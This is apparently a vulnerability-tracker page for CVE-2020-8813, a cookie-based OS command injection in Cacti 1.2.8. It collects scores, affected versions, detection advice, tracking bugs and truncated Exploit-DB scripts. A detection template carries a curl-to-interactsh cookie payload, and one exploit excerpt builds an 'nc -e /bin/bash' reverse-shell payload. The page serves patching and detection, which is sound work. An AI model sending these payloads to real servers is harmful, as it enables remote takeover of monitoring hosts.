CVE-2020-8813
published 2020-02-22CVE-2020-8813: graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph…
PriorityP188high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
73.78%
99.4th percentile
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cacti | cacti | — | — |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| debian | cacti | < cacti 1.2.10+ds1-1 (bookworm) | cacti 1.2.10+ds1-1 (bookworm) |
| debian | debian_linux | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| opmantek | open-audit | — | — |
Detection & IOCsextracted from sources · hover to see the quote
cookieCacti=%3Bcurl%20http%3A//<interactsh-url>
sigma
id: CVE-2020-8813
http:
- raw:
- |
GET /graph_realtime.php?action=init HTTP/1.1
Host: {{Hostname}}
Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}- →Monitor HTTP GET requests to /graph_realtime.php?action=init with a 'Cacti' cookie containing shell metacharacters (e.g., semicolons, ${IFS}, nc, bash). ↗
- →Alert on the 'Cacti' cookie value containing URL-encoded shell injection patterns such as %3B (semicolon), %24%7BIFS%7D, or nc/bash references. ↗
- →Detect POST requests to /user_admin.php enabling guest realtime graph permissions (section25=on, section7=on, tab=realms) as a precursor to exploitation. ↗
- →Check for the string 'poller_realtime.php' in the response body of /graph_realtime.php?action=init as an indicator that the guest realtime feature is enabled and the target is vulnerable. ↗
- →Use Shodan/FOFA queries for Cacti login pages (favicon hash -1797138069, title 'login to cacti') to identify exposed instances for proactive patching.
- ·The unauthenticated RCE path requires the 'Guest Realtime Graphs' privilege to be enabled on the Cacti instance; exploitation is not possible if this setting is disabled.
- ·The authenticated exploit variant first enables guest realtime permissions via /user_admin.php before sending the malicious cookie, meaning admin credentials are required for that attack path. ↗
- ·The Metasploit module defaults to port 443 with SSL and uses php/meterpreter/reverse_tcp as the default payload; detection rules should account for HTTPS traffic to the vulnerable endpoint. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv8.8HIGH
vulncheck8.8HIGH
vendor_debian8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-gg99-fwr4-rcj9: graph_realtime
ghsa_unreviewed·2022-05-24
CVE-2020-8813 [HIGH] CWE-78 GHSA-gg99-fwr4-rcj9: graph_realtime
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
OSV
CVE-2020-8813: graph_realtime
osv·2020-02-22·CVSS 8.8
CVE-2020-8813 [HIGH] CVE-2020-8813: graph_realtime
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
VulnCheck
Cacti Cacti Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2020·CVSS 8.8
CVE-2020-8813 [HIGH] Cacti Cacti Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Cacti Cacti Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
Affected: Cacti Cacti
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2020-8813; https://blog.xlab.qianxin.com/catddos-derivative-en/
Exploit PoC: https://vulncheck.com/xdb/167031624578; https://vulncheck.com/xdb/25649809565f; https://vulncheck.com/xdb/d5d2581a5455
Debian
CVE-2020-8813: cacti - graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary O...
vendor_debian·2020·CVSS 8.8
CVE-2020-8813 [HIGH] CVE-2020-8813: cacti - graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary O...
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
Scope: local
bookworm: resolved (fixed in 1.2.10+ds1-1)
bullseye: resolved (fixed in 1.2.10+ds1-1)
forky: resolved (fixed in 1.2.10+ds1-1)
sid: resolved (fixed in 1.2.10+ds1-1)
trixie: resolved (fixed in 1.2.10+ds1-1)
No detection rules found.
Exploit-DB
Open-AudIT Professional 3.3.1 - Remote Code Execution
exploitdb·2020-04-29·CVSS 8.8
CVE-2020-8813 [HIGH] Open-AudIT Professional 3.3.1 - Remote Code Execution
Open-AudIT Professional 3.3.1 - Remote Code Execution
---
# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
# Date: 2020-04-22
# Exploit Author: Askar
# CVE: CVE-2020-8813
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24
#!/usr/bin/python3
import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 6:
print("[~] Usage : ./openaudit-exploit.py url username password ip port")
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
request = requests.session()
def inject_payload():
configuration_path = ur
Exploit-DB
Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)
exploitdb·2020-03-02·CVSS 8.8
CVE-2020-8813 [HIGH] Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)
Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)
---
# Exploit Title: Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)
# Date: 2020-02-29
# Exploit Author: Lucas Amorim (sh286)s
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: Linux
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Cacti v1.2.8 Unauthenticated Remote Code Execution',
'Description' => %q{graph_realtime.php in Cacti 1.2.8 allows remote attackers to
execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has
the graph real-time privilege.},
'Author' =>
[
'Lucas Amorim ' # MSF module
],
'License' => MSF_LICENSE,
Exploit-DB
Cacti 1.2.8 - Remote Code Execution
exploitdb·2020-02-24·CVSS 8.8
CVE-2020-8813 [HIGH] Cacti 1.2.8 - Remote Code Execution
Cacti 1.2.8 - Remote Code Execution
---
# Exploit Title: Cacti 1.2.8 - Remote Code Execution
# Date: 2020-02-03
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: CentOS 7.3 / PHP 7.1.33
#!/usr/bin/python3
import requests
import sys
import warnings
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
if len(sys.argv) !=3D 6:
print("[~] Usage : ./Cacti-exploit.py url username password ip port")
exit()
url =3D sys.argv[1]
username =3D sys.argv[2]
password =3D sys.argv[3]
ip =3D sys.argv[4]
port =3D sys.argv[5]
def login(token):
login_info =3D {
"login_username": username,
"login_password": password,
"action": "login",
"__c
Exploit-DB
Cacti 1.2.8 - Authenticated Remote Code Execution
exploitdb·2020-02-03·CVSS 8.8
CVE-2020-8813 [HIGH] Cacti 1.2.8 - Authenticated Remote Code Execution
Cacti 1.2.8 - Authenticated Remote Code Execution
---
#!/usr/bin/python3
# Exploit Title: Cacti v1.2.8 Remote Code Execution
# Date: 03/02/2020
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: CentOS 7.3 / PHP 7.1.33
import requests
import sys
import warnings
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 6:
print("[~] Usage : ./Cacti-exploit.py url username password ip port")
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
def login(token):
login_info = {
"login_username": username,
"login_password": password,
"action": "login",
"__csrf_m
Exploit-DB
Cacti 1.2.8 - Unauthenticated Remote Code Execution
exploitdb·2020-02-03·CVSS 8.8
CVE-2020-8813 [HIGH] Cacti 1.2.8 - Unauthenticated Remote Code Execution
Cacti 1.2.8 - Unauthenticated Remote Code Execution
---
#!/usr/bin/python3
# Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution
# Date: 03/02/2020
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: CentOS 7.3 / PHP 7.1.33
import requests
import sys
import warnings
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 4:
print("[~] Usage : ./Cacti-exploit.py url ip port")
exit()
url = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
def send_exploit(url):
payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)
cookies = {'Cacti': quote(payload)}
path = url+"/graph_realtime.php?acti
Nuclei
Cacti v1.2.8 - Remote Code Execution
nuclei·CVSS 8.8
CVE-2020-8813 [HIGH] Cacti v1.2.8 - Remote Code Execution
Cacti v1.2.8 - Remote Code Execution
Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled.
Template:
id: CVE-2020-8813
info:
name: Cacti v1.2.8 - Remote Code Execution
author: gy741
severity: high
description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability.
reference:
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-ex
Bugzilla
CVE-2019-8813 webkitgtk: Incorrect state management leading to universal cross-site scripting
bugzilla·2020-09-07·CVSS 6.1
CVE-2019-8813 [MEDIUM] CVE-2019-8813 webkitgtk: Incorrect state management leading to universal cross-site scripting
CVE-2019-8813 webkitgtk: Incorrect state management leading to universal cross-site scripting
WebKitGTK Security Advisory WSA-2019-0006 describes the following issue:
CVE-2019-8813
Impact: Processing maliciously crafted web content may lead to universal cross site scripting. Description: A logic issue was addressed with improved state management.
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before 2.26.1.
Discussion:
External References:
https://webkitgtk.org/security/WSA-2019-0006.html
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 7
Via RHSA-2020:4035 https://access.redhat.com/errata/RHSA-2020:4035
---
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):
https://access.redha
Bugzilla
CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs [epel-all]
bugzilla·2020-03-04·CVSS 8.8
CVE-2020-8813 [HIGH] CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs [epel-all]
CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects
Bugzilla
CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs [fedora-all]
bugzilla·2020-03-04·CVSS 8.8
CVE-2020-8813 [HIGH] CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs [fedora-all]
CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue aff
Bugzilla
CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs
bugzilla·2020-03-04·CVSS 8.8
CVE-2020-8813 [HIGH] CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs
CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
Reference:
https://github.com/Cacti/cacti/issues/3285
Discussion:
Created cacti tracking bugs for this issue:
Affects: epel-all [bug 1810240]
Affects: fedora-all [bug 1810239]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Threat Research Center
Threat Research
Cybercrime
## Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Yue Guan
Jin Chen
Leo Olson
Wayne Xin
Daiping Liu
Published: October 14, 2021
Cybercrime
Threat Research
Attack analysis
Exploit
Exploit in the wild
Interactsh
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh . This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC
http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.htmlhttp://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.htmlhttp://packetstormsecurity.com/files/156537/Cacti-1.2.8-Unauthenticated-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156538/Cacti-1.2.8-Authenticated-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156593/Cacti-1.2.8-Unauthenticated-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/157477/Open-AudIT-Professional-3.3.1-Remote-Code-Execution.htmlhttps://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/viewhttps://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129https://github.com/Cacti/cacti/issues/3285https://github.com/Cacti/cacti/releaseshttps://lists.debian.org/debian-lts-announce/2022/12/msg00039.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M77SS33IDVNGBU566TK2XVULPW3RXUQ4/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WAX3LDXPIKWNBGVZSIMZV7LI5K6BZRTO/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XEMDQXDRNQYXOME7TACKDVCXZXZNGZE2/https://security.gentoo.org/glsa/202004-16https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.htmlhttp://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.htmlhttp://packetstormsecurity.com/files/156537/Cacti-1.2.8-Unauthenticated-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156538/Cacti-1.2.8-Authenticated-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156593/Cacti-1.2.8-Unauthenticated-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/157477/Open-AudIT-Professional-3.3.1-Remote-Code-Execution.htmlhttps://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/viewhttps://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129https://github.com/Cacti/cacti/issues/3285https://github.com/Cacti/cacti/releaseshttps://lists.debian.org/debian-lts-announce/2022/12/msg00039.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M77SS33IDVNGBU566TK2XVULPW3RXUQ4/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WAX3LDXPIKWNBGVZSIMZV7LI5K6BZRTO/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XEMDQXDRNQYXOME7TACKDVCXZXZNGZE2/https://security.gentoo.org/glsa/202004-16https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
2020-02-22
Published
Exploited in the wild